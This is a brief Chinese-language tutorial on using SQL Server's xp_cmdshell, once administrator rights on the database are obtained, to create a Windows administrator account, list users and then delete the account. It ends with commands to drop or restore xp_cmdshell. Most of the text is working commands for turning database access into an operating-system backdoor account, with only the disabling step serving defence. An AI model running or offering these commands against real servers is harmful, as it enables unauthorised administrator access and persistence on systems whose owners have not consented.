如果获得某台SQLSERVER服务器的管理员权限,服务器又没有做特殊的限制,就可以为系统添加管理帐号
打开查询分析器,连接到服务器sql server的master库,分别执行如下SQL语句
xp_cmdshell 'net user ZB 1234 /add'
xp_cmdshell 'net localgroup administrators ZB /add'
使用完以后删除
xp_cmdshell 'net localgroup administrators ZB /delete'
xp_cmdshell 'net user ZB /delete'
查看已有的系统用户
xp_cmdshell 'net user '
xp_cmdshell 是sql的一个扩展那存储过程,用于执行一个命令行语句
我们使用net user /add添加一个用户,然后使用 net localgroup 命令把这个用户添加到管理员组
禁用xp_cmdshell
Use Master
Exec sp_dropextendedproc N’xp_cmdshell’
恢复xp_cmdshell
Exec sp_addextendedproc N’xp_cmdshell’, N’xplog70.dll’